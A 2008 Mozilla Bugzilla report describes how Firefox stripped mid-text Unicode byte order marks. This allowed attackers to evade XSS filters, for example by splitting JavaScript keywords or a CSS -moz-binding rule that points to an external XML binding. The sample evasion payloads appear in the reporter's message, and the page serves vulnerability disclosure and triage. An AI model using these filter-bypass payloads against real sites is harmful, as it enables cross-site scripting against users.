Bugzilla@Mozilla – Bug 446112
Stripping in-line BOM is an XSS risk
Last modified: 2008-11-16 23:12:29 PST
Summon comment box
This is much like JavaScript bug 430740 but affects HTML/CSS parsing. security@m.o. received the following from Chris Weber of Casaba Security: July 17, 2008 Platform: Windows XP SP3 and SP2 Product: Firefox 3.0.1 Issue Type: attack technique for filter bypass and evasion which enables cross-site scripting Exploitability: Easy Remote: Yes Here's an attack that leverages a vulnerability in the way Firefox handles Unicode Byte Order Marks U+FEFF and U+FFFE in the javascript interpreter. The Unicode spec and FAQ at http://unicode.org/faq/utf_bom.html calls for implementations to treat a BOM in the middle of a file as ZWNBS. The best behavior would be to make the ZWNBS a part of the string, which would have the effect of difusing any attack exploiting this technique. "Q: What should I do with U+FEFF in the middle of a file? A: In the absence of a protocol supporting its use as a BOM and when not at the beginning of a text stream, U+FEFF should normally not occur. For backwards compatibility it should be treated as ZERO WIDTH NON-BREAKING SPACE (ZWNBSP), and is then part of the content of the file or string." Right now, we can insert a BOM in the middle of javascript method names, strings, and keywords such as 'var'. This enables exploits where attackers can control fragments of javascript such as: var x = "here's a U+FEFF in the middle of a string"; alert(x); al[U+FEFF]ert("heres a U+FEFF in the middle of the alert() method name"); v[U+FEFF]ar y = "here's a U+FEFF in the middle of the var keyword"; alert(y); We can also insert a BOM in the middle of a CSS string such as -moz-binding, enabling attacks which bypass validation filters. The attack would look like: p { -moz-bi[U+FEFF]nding: url(http://casabasecurity.com/stage/example_2.xml#redirect) } I'll stop elaborating from here. In short this issue allows for a lot of flexibility in bypassing validation or other logic attackers might want to bypass to enable attacks such as cross-site scripting. Thanks, Chris
Created attachment 330316 [details] example (mostly of bug 430740)
The JavaScript part is covered by bug 430740, this bug is to cover similar issues in HTML/XML/CSS parsing. Bug 430740 happens to Firefox 2.0, but the -moz-binding issue seems to be a regression in FF3.
I was fooled by running the testcase on Chris's site, which is not quite the one attached here (doesn't have the BOM in -moz-binding). When running on my own server I could only reproduce the JavaScript cases covered by bug 430740 and not any problems with BOM injected into HTML tags and attributes or style data. *** This bug has been marked as a duplicate of bug 430740 ***
I didn't mean to fool you with regard to the CSS BOM injection, it was a mistake on my part. As you said I can't reproduce that either right now. Back to testing, Chris
Didn't mean to imply it might have been intentional fooling, I fooled myself going too fast through my first triage pass. No harm done, and thanks again for reporting the JavaScript problem--it's a serious potential XSS risk.
Forgot to credit Chris in the advisory. Updated http://www.mozilla.org/security/announce/2008/mfsa2008-43.html